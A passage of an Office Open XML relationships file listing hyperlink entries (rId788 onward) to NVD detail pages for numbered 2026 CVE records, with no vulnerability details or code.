Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50186" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50191" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50768" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51974" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52691" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52775" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52872" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52876" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53071" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53277" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53322" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53527" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53528" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53542" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53547" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53706" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54099" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54721" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55485" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55509" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55521" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55541" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55585" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55637" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55676" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57161" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57162" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57163" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57866" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58095" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58096" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61574" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62316" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62357" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62666" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62744" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62895" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64364" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65772" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6734" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68561" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68828" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69258" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69285" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69334" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69355" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69360" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69386" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69434" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69442" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69485" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69494" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69495" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69499" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69511" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69529" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69547" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69556" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69598" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69601" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69603" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69614" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69628" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69629" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69632" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69649" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69671" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69676" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69678" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69686" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69712" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69722" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69729" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69740" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69742" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69759" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69764" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69767" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69772" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69778" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69784" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69797" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69857" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70178" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70351" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70456" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70458" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71352" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71694" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71808" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72866" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72875" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72883" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72933" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72940" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72950" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72959" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72960" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72972" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72973" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72986" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73018" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73222" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73224" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73226" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73284" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73293" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73305" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73667" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73753" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73763" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73784" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73841" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74997" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75007" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75161" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75166" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75169" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75339" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75624" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 